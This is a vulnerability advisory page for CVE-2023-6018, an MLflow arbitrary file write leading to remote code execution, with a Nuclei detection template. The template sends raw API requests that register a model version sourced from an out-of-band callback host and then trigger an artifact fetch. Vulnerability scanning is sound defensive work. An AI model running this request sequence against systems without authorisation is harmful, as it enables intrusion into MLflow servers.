Critical Severity

mlflow

Remote Code Execution via Controlled File Write

A vulnerability in MLflow versions 2.6.0 to 2.9.1 allows remote code execution through a controlled file write mechanism. The issue arises from the handling of model source URLs, enabling an attacker to create or overwrite arbitrary files on the system. This vulnerability was patched in version 2.9.2.

Available publicly on Nov 16 2023

10

CVE:

CVE-2023-6018

CWE:

23:Relative Path Traversal

CVSS:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Credit:

kevin-mizu
AssessDetect

Available

Remediate
Nuclei Template
Nuclei Template
1id: mlflow-arbitrary-file-write
2info:
3  name: Mlflow Arbitrary File Write via model-versions API endpoint
4  author: kevin_mizu (Vuln Discovery), byt3bl33d3r (Nuclei Template)
5  severity: critical
6  description: An attacker can overwrite arbitrary files in MLFlow via it's model-versions API
7  reference:
8    - https://huntr.com/bounties/7cf918b5-43f4-48c0-a371-4d963ce69b30/
9  classification:
10    cvss-score: 10
11    cve-id: CVE-2023-6018
12    cwe-id: CWE-29
13  tags: mlflow,ml,cve,huntr,protectai
14variables:
15  model_name: "{{rand_text_alpha(6)}}"
16http:
17  - raw:
18      - |
19        POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
20        Host: {{Hostname}}
21        Content-Type: application/json
22
23        {"name": "{{model_name}}"}
24      - |
25        POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
26        Host: {{Hostname}}
27        Content-Type: application/json
28
29        {"name": "{{model_name}}", "source": "http://{{interactsh-url}}/api/2.0/mlflow-artifacts/artifacts/"}
30      - |
31        POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
32        Host: {{Hostname}}
33        Content-Type: application/json
34
35        {"name": "{{model_name}}", "source": "models:/{{model_name}}/1"}
36      - |
37        GET /model-versions/get-artifact?path=random&name={{model_name}}&version=2 HTTP/1.1
38        Host: {{Hostname}}
39
40    matchers:
41      - type: word
42        part: interactsh_protocol # Confirms http Interaction
43        words:
44          - "http"
Resources

Learn how to use the Nuclei scanners and other scripts, or download the scanners and use them yourself.

How to use Nuclei scanners

Learn more about scanners and how to use them

Want more out of Sightline?

Sightline offers even more for premium customers

Go Premium

We have 290 related security advisories that are available with Sightline Premium.

Sightline logo
About Protect AIPrivacy PolicyTerms of Service
© 2024 Protect AI, Inc.
Slack iconLinkedIn iconYoutube iconX icon